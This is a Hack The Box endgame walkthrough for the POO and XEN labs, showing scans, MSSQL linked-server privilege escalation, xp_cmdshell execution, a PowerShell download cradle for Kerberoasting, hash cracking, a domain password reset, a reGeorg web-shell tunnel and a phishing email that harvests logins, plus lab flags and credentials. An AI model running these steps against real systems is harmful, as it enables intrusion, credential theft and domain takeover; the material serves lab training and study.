TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

It seems we have discovered a few ports open. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones for me to look at seemed to be the ‘admin’ folder and ‘.DS_Store’ file. Simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder that it resides in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using https://github.com/lijiejie/ds_store_exp

python ds_store_exp.py http://10.13.38.11/.DS_Store

We have some interesting directories. I ran the IIS Shortname scanner located at https://github.com/irsdl/IIS-ShortName-Scanner to see if I could come up with anything interesting, and one specific directory came up with good information.

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.


This seemed to be details to a SQL database. And we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag Select * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}

Creating a SQL user puckie in SQL Management Studio:

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

 

SHELL Access
I needed to enable xp_cmdshell


Now that I had sysadmin rights on the box, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
python3 mssql_shell.py from https://github.com/puckiestyle/python/blob/master/mssql_shell.py

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.


After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page


Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


POO{4882bd2ccfd4b5318978540d9843729f}

IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name="Block network access for R local user accounts in SQL Server instance POO_PUBLIC"


And then I noticed an IPv6 address and another adapter.


I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-winrm to find the 4th flag

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}

I wanted to see what I could find out about the domain. Knowing that the box is on a domain, I was hoping for some Kerberos tickets that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier.

Kerberoasting
I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This came back with 2 accounts.

This one was named p00_hr.

This one was named p00_adm.


I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

Hashcat
I proceeded to run these 2 tokens through hashcat and run them with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.
p00_hr:Password123!

However, when I ran the p00_adm account through rockyou, it did not return any result. I then decided to run the token through all passwords found in all text files within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r
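Why one of these accounts fell to rockyou in seconds and the other needed a larger list is mostly visible in the hash lines themselves: the second field of a `$krb5tgs$` line is the Kerberos encryption type, and `23` (RC4-HMAC, hashcat `-m 13100`) means the ticket is keyed by the account's NT hash, which is a single MD4 of the password. The script below is an added example (not from this writeup): it parses the `-m 13100` layout used above and the AES layout (`-m 19600`/`19700`), and rates each account's exposure. The hash bodies are placeholder hex, the realm `POO.LOCAL` and the SPNs are assumed (the page only shows the NetBIOS name POO and the account names), so nothing here is a real ticket.

```python
"""Triage Kerberoast output: read the $krb5tgs$ lines hashcat consumes, pull
out the encryption type, account and SPN, and rate how exposed each account is.

Added example, not from the original writeup. The hash bodies are placeholder
hex; the realm POO.LOCAL and the SPNs are assumptions (the page only shows the
NetBIOS name POO and the two account names).
"""
from typing import Dict, List

ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}


def parse_krb5tgs(line: str) -> Dict:
    """Parse '$krb5tgs$<etype>$*user$realm$spn*$checksum$edata' (RC4, -m 13100)
    and the AES layout '$krb5tgs$<etype>$user$realm$[*spn*$]checksum$edata'."""
    parts = line.strip().split("$")          # parts[0] == '' because of the leading '$'
    if len(parts) < 6 or parts[1] != "krb5tgs":
        raise ValueError("not a $krb5tgs$ hash line")
    etype = int(parts[2])
    checksum, edata = parts[-2], parts[-1]
    middle = parts[3:-2]
    if middle[0].startswith("*"):            # RC4 layout: *user, realm, spn*
        user, realm = middle[0][1:], middle[1]
        spn = "$".join(middle[2:]).rstrip("*")
    else:                                    # AES layout: user, realm, optional *spn*
        user, realm = middle[0], middle[1]
        spn = "$".join(middle[2:]).strip("*")
    return {"etype": etype, "etype_name": ETYPE_NAMES.get(etype, "unknown"),
            "user": user, "realm": realm, "spn": spn,
            "checksum": checksum, "edata_bytes": len(edata) // 2}


def hashcat_mode(etype: int) -> int:
    return HASHCAT_MODES[etype]


def triage(lines: List[str]) -> List[Dict]:
    """Rate each ticket: RC4 tickets are cheap to guess offline, AES ones are not."""
    out = []
    for h in map(parse_krb5tgs, lines):
        if h["etype"] == 23:
            risk, why = "high", ("RC4-HMAC: the ticket key is the account's NT hash "
                                 "(one MD4 of the password), so offline guessing is cheap")
        elif h["etype"] in (17, 18):
            risk, why = "medium", ("AES: the key is PBKDF2-HMAC-SHA1 with 4096 iterations, "
                                   "so each guess is far slower, but weak passwords still fall")
        else:
            risk, why = "unknown", f"unrecognised etype {h['etype']}"
        out.append({**h, "risk": risk, "why": why,
                    "hashcat_mode": HASHCAT_MODES.get(h["etype"])})
    return out


# Constructed sample lines: checksum/edata are placeholder hex, not real tickets.
SAMPLE_LINES = [
    "$krb5tgs$23$*p00_hr$POO.LOCAL$HTTP/web.poo.local*$" + "0" * 32 + "$" + "ab" * 64,
    "$krb5tgs$18$p00_adm$POO.LOCAL$*MSSQLSvc/compatibility.poo.local:1433*$"
    + "0" * 24 + "$" + "cd" * 64,
]

if __name__ == "__main__":
    for t in triage(SAMPLE_LINES):
        print(f"{t['user']}@{t['realm']} spn={t['spn'] or '?'} etype={t['etype']} "
              f"({t['etype_name']}) risk={t['risk']} hashcat=-m {t['hashcat_mode']}")
        print("   ", t["why"])
```

On the defending side the fix follows from the triage: service accounts with SPNs should have long random passwords (or be group managed service accounts), their `msDS-SupportedEncryptionTypes` should allow only AES so that no RC4 ticket can be requested for them, and a burst of 4769 events with ticket encryption type `0x17` for many different SPNs from one client is the roasting itself.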

Now that I had both passwords cracked, I needed to try and gain access to the domain controller, which was on 172.20.128.53.

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1


Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account named mr3ks.


PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1
c:\temp\sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the web root folder.

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx


I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now for me to create my tunnel with reGeorg.

python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx


I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type;
dism /online /enable-feature /featurename:NetFx4Extended-ASPNET45 /All

…..extra…

kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

SQL>


msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user...
[+] 10.13.38.11:1433 - Connected.
[*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY
[*] 10.13.38.11:1433 - Domain Name: POO
[+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.13.38.11:1433 - - POO\Administrator
[*] 10.13.38.11:1433 - - POO\Guest
[*] 10.13.38.11:1433 - - POO\krbtgt
[*] 10.13.38.11:1433 - - POO\DefaultAccount
[*] 10.13.38.11:1433 - - POO\Domain Admins
[*] 10.13.38.11:1433 - - POO\Domain Users
[*] 10.13.38.11:1433 - - POO\Domain Guests
[*] 10.13.38.11:1433 - - POO\Domain Computers
[*] 10.13.38.11:1433 - - POO\Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cert Publishers
[*] 10.13.38.11:1433 - - POO\Schema Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Admins
[*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners
[*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers
[*] 10.13.38.11:1433 - - POO\Protected Users
[*] 10.13.38.11:1433 - - POO\Key Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Key Admins
[*] 10.13.38.11:1433 - - POO\RAS and IAS Servers
[*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\mr3ks
[*] 10.13.38.11:1433 - - POO\DC$
[*] 10.13.38.11:1433 - - POO\DnsAdmins
[*] 10.13.38.11:1433 - - POO\DnsUpdateProxy
[*] 10.13.38.11:1433 - - POO\COMPATIBILITY$
[*] 10.13.38.11:1433 - - POO\p00_hr
[*] 10.13.38.11:1433 - - POO\p00_dev
[*] 10.13.38.11:1433 - - POO\p00_adm
[*] 10.13.38.11:1433 - - POO\P00 Help Desk
[+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed


msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11
rhosts => 10.13.38.11
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Running MS SQL Server Enumeration...
[*] 10.13.38.11:1433 - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.13.38.11:1433 - Configuration Parameters:
[*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled
[*] 10.13.38.11:1433 - xp_cmdshell is Enabled
[*] 10.13.38.11:1433 - remote access is Enabled
[*] 10.13.38.11:1433 - allow updates is Not Enabled
[*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled
[*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled
[*] 10.13.38.11:1433 - Databases on the server:
[*] 10.13.38.11:1433 - Database name:master
[*] 10.13.38.11:1433 - Database Files for master:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] 10.13.38.11:1433 - Database name:tempdb
[*] 10.13.38.11:1433 - Database Files for tempdb:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] 10.13.38.11:1433 - Database name:POO_PUBLIC
[*] 10.13.38.11:1433 - Database Files for POO_PUBLIC:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] 10.13.38.11:1433 - System Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - Disabled Accounts:
[*] 10.13.38.11:1433 - No Disabled Logins Found
[*] 10.13.38.11:1433 - No Accounts Policy is set for:
[*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 10.13.38.11:1433 - Password Expiration is not checked for:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - System Admin Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - Windows Logins on this Server:
[*] 10.13.38.11:1433 - No Windows logins found!
[*] 10.13.38.11:1433 - Windows Groups that can logins on this Server:
[*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system.
[*] 10.13.38.11:1433 - Accounts with Username and Password being the same:
[*] 10.13.38.11:1433 - No Account with its password being the same as its username was found.
[*] 10.13.38.11:1433 - Accounts with empty password:
[*] 10.13.38.11:1433 - No Accounts with empty passwords where found.
[*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found:
[*] 10.13.38.11:1433 - sp_replsetsyncstatus
[*] 10.13.38.11:1433 - sp_replcounters
[*] 10.13.38.11:1433 - sp_replsendtoqueue
[*] 10.13.38.11:1433 - sp_resyncexecutesql
[*] 10.13.38.11:1433 - sp_prepexecrpc
[*] 10.13.38.11:1433 - sp_repltrans
[*] 10.13.38.11:1433 - sp_xml_preparedocument
[*] 10.13.38.11:1433 - xp_qv
[*] 10.13.38.11:1433 - xp_getnetname
[*] 10.13.38.11:1433 - sp_releaseschemalock
[*] 10.13.38.11:1433 - sp_refreshview
[*] 10.13.38.11:1433 - sp_replcmds
[*] 10.13.38.11:1433 - sp_unprepare
[*] 10.13.38.11:1433 - sp_resyncprepare
[*] 10.13.38.11:1433 - sp_createorphan
[*] 10.13.38.11:1433 - xp_dirtree
[*] 10.13.38.11:1433 - sp_replwritetovarbin
[*] 10.13.38.11:1433 - sp_replsetoriginator
[*] 10.13.38.11:1433 - sp_xml_removedocument
[*] 10.13.38.11:1433 - sp_repldone
[*] 10.13.38.11:1433 - sp_reset_connection
[*] 10.13.38.11:1433 - xp_fileexist
[*] 10.13.38.11:1433 - xp_fixeddrives
[*] 10.13.38.11:1433 - sp_getschemalock
[*] 10.13.38.11:1433 - sp_prepexec
[*] 10.13.38.11:1433 - xp_revokelogin
[*] 10.13.38.11:1433 - sp_execute_external_script
[*] 10.13.38.11:1433 - sp_resyncuniquetable
[*] 10.13.38.11:1433 - sp_replflush
[*] 10.13.38.11:1433 - sp_resyncexecute
[*] 10.13.38.11:1433 - xp_grantlogin
[*] 10.13.38.11:1433 - sp_droporphans
[*] 10.13.38.11:1433 - xp_regread
[*] 10.13.38.11:1433 - sp_getbindtoken
[*] 10.13.38.11:1433 - sp_replincrementlsn
[*] 10.13.38.11:1433 - Instances found on this server:
[*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.13.38.11:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle


htb-endgame-xen

Hack the Box – XEN (retired June 2020)

First I add the IP of the machine, 10.13.38.12, to /etc/hosts as xen.htb.

NMAP

As always we start with an nmap scan.

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

It seems we have HTTP and HTTPS on ports 80 and 443, and SMTP on 25.

Overview of Web Services

Let’s take a quick look at the web pages to see what we have. Port 80 redirected me to port 443, and the certificate presented for the site revealed a new domain: humongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn’t come up with anything useful.

wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

We had several other directories that seemed interesting, but the ones I wanted to look at were Remote and Jakarta.

Opening https://humongousretail.com/remote, I get the following.

And browsing https://humongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful; I looked deeper into the directories and for known exploits for the XenApp application. Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory rather than Jakarta. After spending some more time on this, I decided to investigate the SMTP service; I had done exercises in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone.

smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I found 4 addresses:

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects. I eventually got a hit with the subject of Remote. My idea was to try to get the users to click on my link. The session went as follows:

telnet 10.13.38.12 25
helo humongousretail.com
MAIL FROM: it@humongousretail.com
RCPT TO: sales@humongousretail.com
DATA
Subject: Remote Portal

Hi,

The URL for the remote portal has now been changed to http://10.14.15.106

Regards
IT
QUIT

I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I now had 3 users:

pmorgan:Summer1Summer!
jmendes:VivaBARC3L0N@!!!
awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere. I browsed to the remote site and entered the credentials of pmorgan.

And I now had access to a desktop.

I tried this for each user that I had, and each of them worked and successfully logged in.

I clicked on the Desktop to access it and was asked to open the launch.ica file, which by default opens with the Citrix Receiver Engine, after I had installed icaclientWeb_19.12.0.19_amd64.deb on Kali.

Once I had clicked OK, I was presented with a Desktop. I browsed to the Desktop of the user and was presented with the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

